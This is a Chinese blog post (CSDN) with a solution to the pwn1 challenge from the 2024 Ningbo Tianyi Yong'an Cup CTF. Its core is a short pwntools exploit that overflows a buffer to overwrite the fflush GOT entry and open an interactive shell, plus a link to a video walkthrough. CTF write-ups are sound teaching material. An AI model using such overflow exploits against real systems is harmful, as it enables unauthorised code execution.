2024宁波天一永安杯pwn1题解

已于 2024-05-05 20:22:03 修改
阅读量256 收藏
点赞数 4
文章标签: 安全
于 2024-05-05 20:21:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z22168/article/details/138472963
版权 
from pwn import *
io=process('./pwn')
#io=remote("47.100.57.198",32249)
elf=ELF('./pwn')
fflush_got=elf.got['fflush']
print(hex(fflush_got))
io.recv()
io.sendline('1')
io.recv()
payload=b'a'*(0x78-0x10)+p32(fflush_got)
io.sendline(payload)
io.recv()
io.sendline('134514474')
io.interactive()

详细题解和思路我在b站有视频

【宁波天一永安杯2024pwn1】 https://www.bilibili.com/video/BV11C411773L/?share_source=copy_web&vd_source=ed440e32ae7ae7faab7b9a2b3236e338

欢迎大家来指正

_gets
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
天一永安杯” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
Jay17的博客
05-07 782
天一永安杯” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
宁波天一永安杯初赛 wp-AGCTS战队
akxnxbshai的博客
06-22 991
以前的wp,发一下。
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1731
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
强网杯2022 pwn题解析——yakagame
CoLin的pwn小屋
07-31 3247
强网杯2022-pwn yakagame write-up
网鼎杯第一场 部分re crypto pwn 题解
qq_41071646的博客
05-11 1223
这次没想到还拿了一道re的一血、 题目名称 re bang 一看题目就知道需要dump dex 正好手边手机开启了frida 直接dump dex 脚本一把梭,然后直接反编译 发现flag 拿到了一血,, 题目名称 re signal 这个题目 自己实现了vm 自己写了一个脚本(不要吐槽我的拼音,当时有点着急 就没有想那么多) 自己写了一个python代码模拟了一下 lists=[10,4,16,8,3,5,1,4,32,8,5,3,1,3,2,8,11,1,12,8,4..
东华杯-pwn-cpp1
One_p_Two_w的博客
11-11 3024
东华杯-pwn-cpp1 前一阵子东华杯的pwn题,比赛时候没做出来,说起来那时候我才刚学到fastbin attack,天天在和libc2.23打交道,比赛的时候时候看见libc全是2.31的…孩子人都傻了,遂去misc划水。。。(r n m,退钱!) 现在终于看了tcache,寻思试一下之前的赛题,于是有了这篇博客,做起来发现,好像并没有那么难? 我本地的环境就是2.31的,所以就在本地尝试复现了一下,文件已经传到了网盘,想复现的师傅们可以在这里下载 分析 main函数如下 菜单 new new中允
攻防世界PWNpwn11题解
seaaseesa的博客
02-09 681
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
祥云杯2022 pwn - protocol
z1r0的博客
11-09 1173
笔者这里的rop就是read(0, xxxxx, 0x50),execve(“xxxx”, 0, 0)来getshell。在拷贝username和password的时候发生了栈溢出漏洞,因为username和password可控。直接放rop的话是不行的,因为\x00在strcpy中会被截断,所以倒着写rop。一开始没看出来是Protobuf,搜了一圈里面的东西才知道是Protobuf。首先需要得到ctf.proto这个东西然后按着下面的顺序就行。这个时候就可以得到一个ctf.proto的文件。
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 1998
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
强网杯2022 pwn题解析.docx
12-18
【强网杯2022 Pwn题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 426
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 297
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1363
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值